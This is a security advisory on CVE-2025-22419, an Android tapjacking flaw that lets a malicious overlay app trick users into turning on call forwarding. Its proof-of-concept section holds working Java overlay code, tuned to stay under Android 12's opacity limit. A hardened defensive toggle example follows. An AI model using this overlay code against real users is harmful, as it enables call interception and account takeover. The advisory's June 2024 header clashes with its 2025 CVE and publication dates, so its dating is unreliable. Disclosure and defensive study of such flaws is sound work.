Date: June 2024
Author: Security Analyst XYZ
Severity: High
CVSS: 7.2 (High)
References:
- CVE-2025-22419 at MITRE
- Google Android Security Bulletins
- Android Tapjacking Technical Overview
Overview
CVE-2025-22419 is a newly reported vulnerability affecting multiple Android builds and custom ROMs, in the device's call forwarding settings screen. The core problem is that this system Settings screen acts on touches even while another app's window is drawn over it, so an attacker can place a seemingly innocent UI (user interface) over the legitimate screen and let the victim's taps fall through to it. This is a tapjacking attack, the mobile form of clickjacking.
Through a malicious app holding the overlay permission, a user can be misled into tapping on sensitive controls, such as the "Enable Call Forwarding" switch, so that their incoming calls are forwarded to an attacker-controlled number. This is not only a privacy concern: it can be weaponized for interception of calls and voice one-time codes, phishing, or as a step in SIM swap and account takeover attacks.
Technical Details
The tapjacking attack leverages Android's ability to draw one app's window on top of another, using overlay windows granted through the SYSTEM_ALERT_WINDOW ("Display over other apps") permission or, on older releases, custom Toast views. By displaying a disguised overlay that does not itself accept touches on top of the call forwarding settings, the attacker manipulates the user into unintentionally enabling a dangerous feature.
1. Victim installs a malicious app that requests the overlay permission.
2. Attacker triggers the overlay at the exact position of the enable toggle in the phone's call forwarding settings.
3. User thinks they are interacting with an innocuous button (a "Win a Prize!" dialog, for example).
4. User's tap passes through the overlay and is registered on the underlying Settings activity, flipping the call forwarding toggle and committing the attacker's number.
User interaction is required for exploitation. Victims must launch the provided app and follow simple instructions in the popup, believing they are participating in a harmless activity.
Exploit Proof of Concept (PoC)
Below is a condensed example of how an attacker could implement such a tapjacking attack. This is for educational and defensive use only!
<!-- AndroidManifest.xml (request overlay permission) -->
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
// MainActivity.java
import android.content.Intent;
import android.graphics.PixelFormat;
import android.net.Uri;
import android.provider.Settings;
import android.view.Gravity;
import android.view.WindowManager;
import android.widget.ImageView;

private static final int REQUEST_OVERLAY = 1;

// Ask for the "Display over other apps" permission once; draw the overlay once it is granted
if (!Settings.canDrawOverlays(this)) {
    Intent intent = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
            Uri.parse("package:" + getPackageName()));
    startActivityForResult(intent, REQUEST_OVERLAY);
} else {
    showOverlay();
}

private void showOverlay() {
    WindowManager windowManager = (WindowManager) getSystemService(WINDOW_SERVICE);
    // The lure ("Win a Prize!" button) is drawn exactly over the 'Enable Call Forwarding' toggle
    ImageView fakeButton = new ImageView(this);
    fakeButton.setImageResource(R.drawable.fake_button);
    WindowManager.LayoutParams params = new WindowManager.LayoutParams(
            300, 100, // size matching target
            WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY, // overlay window type, API 26+
            WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
            WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE, // the overlay never receives touches
            PixelFormat.TRANSLUCENT);
    // Android 12+ blocks touches that pass through another app's window whose
    // opacity exceeds 0.8, so the window alpha must stay at or below that value
    params.alpha = 0.8f;
    params.gravity = Gravity.TOP | Gravity.START;
    params.x = <calculated_x>;
    params.y = <calculated_y>;
    windowManager.addView(fakeButton, params);
    // The user's tap is not consumed by the overlay: it lands on the Settings
    // activity underneath, which flips the toggle
}
Note: Offsets <calculated_x> and <calculated_y> depend on screen size, density and the Settings layout of the target build, requiring some trial and error for accurate positioning.
1. The malicious app is distributed through unofficial app stores or phishing links.
2. The victim is prompted to "tap the button to continue" while the call forwarding settings are open (for example via guided steps or an embedded browser).
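The app-side defense against this class of attack is to refuse touches that arrive while the sensitive view is covered by another window. The following is an added example (not code from the original advisory or from AOSP) of a Settings-style call forwarding toggle hardened that way, using only platform APIs: View#setFilterTouchesWhenObscured, which makes the framework drop obscured touches, and the MotionEvent.FLAG_WINDOW_IS_OBSCURED / FLAG_WINDOW_IS_PARTIALLY_OBSCURED flags for an explicit check that also logs the attempt. The class name CallForwardingActivity, the layout and view IDs, and the helper sendEnableCallForwarding() are hypothetical names chosen for illustration.

```java
// Added example: a call forwarding toggle that rejects tapjacked touches.
// Assumes the hypothetical layout R.layout.call_forwarding containing a
// Switch with id R.id.call_forwarding_switch; sendEnableCallForwarding()
// stands in for whatever telephony call the real screen makes.
package com.example.hardened;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.view.MotionEvent;
import android.view.View;
import android.widget.Switch;
import android.widget.Toast;

public class CallForwardingActivity extends Activity {
    private static final String TAG = "CallForwarding";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.call_forwarding);

        Switch toggle = findViewById(R.id.call_forwarding_switch);

        // Layer 1 (declarative): the framework discards any touch delivered while
        // another window obscures this view. Same effect as
        // android:filterTouchesWhenObscured="true" on the Switch in the layout XML.
        toggle.setFilterTouchesWhenObscured(true);

        // Layer 2 (explicit): inspect the obscured flags ourselves so that
        // partially obscured touches (flag added in API 29) are also rejected
        // and the attempt is logged for later investigation.
        toggle.setOnTouchListener(new View.OnTouchListener() {
            @Override
            public boolean onTouch(View v, MotionEvent event) {
                if (isObscured(event) && event.getAction() == MotionEvent.ACTION_DOWN) {
                    Log.w(TAG, "Touch on call forwarding switch rejected: window obscured");
                    Toast.makeText(v.getContext(),
                            "Close apps drawing over the screen before changing this setting",
                            Toast.LENGTH_SHORT).show();
                    return true; // consume the event: the Switch never flips
                }
                return false; // a clean touch is handled by the Switch as usual
            }
        });

        toggle.setOnCheckedChangeListener((button, isChecked) -> {
            if (isChecked) {
                sendEnableCallForwarding();
            }
        });
    }

    // True when the touch passed through another window on its way to us.
    static boolean isObscured(MotionEvent event) {
        int flags = event.getFlags();
        return (flags & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0
                || (flags & MotionEvent.FLAG_WINDOW_IS_PARTIALLY_OBSCURED) != 0;
    }

    private void sendEnableCallForwarding() {
        // Hypothetical: the real screen would call into the telephony stack here.
        Log.i(TAG, "Call forwarding enabled by an unobscured user touch");
    }
}
```

Both layers are needed in practice. Android 12 and later already block touches that pass through another app's window when that window is more opaque than 0.8, but a lure drawn at or below that opacity is still passed through, and the filterTouchesWhenObscured check is what stops it regardless of the overlay's transparency. Logging the rejected touch gives a detection signal: a Settings screen that repeatedly sees obscured touches on a security-sensitive control is worth surfacing to the user or to telemetry.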
Impact
- Local privilege escalation: the malicious app effectively changes a protected telephony setting it holds no permission for, without the user's informed consent.
- Communication interception: all incoming calls can be forwarded to the attacker.
- Potential account compromise: used as a step in attacks on phone-based two-factor authentication and account recovery, such as SIM swap.
References & Further Reading
- Android Tapjacking Protection
- Lookout Clickjacking Report
- CVE-2025-22419 at NVD (soon)
Conclusion:
CVE-2025-22419 highlights the importance of securing interactions with core device settings, even as Android's UI protections against overlays keep improving. Tapjacking is a classic but still effective abuse technique. Users and developers alike should stay alert for social engineering attacks that leverage overlay permissions, and should keep devices and apps updated.
Timeline
Published on: 09/02/2025 23:15:33 UTC
Last modified on: 09/04/2025 16:39:48 UTC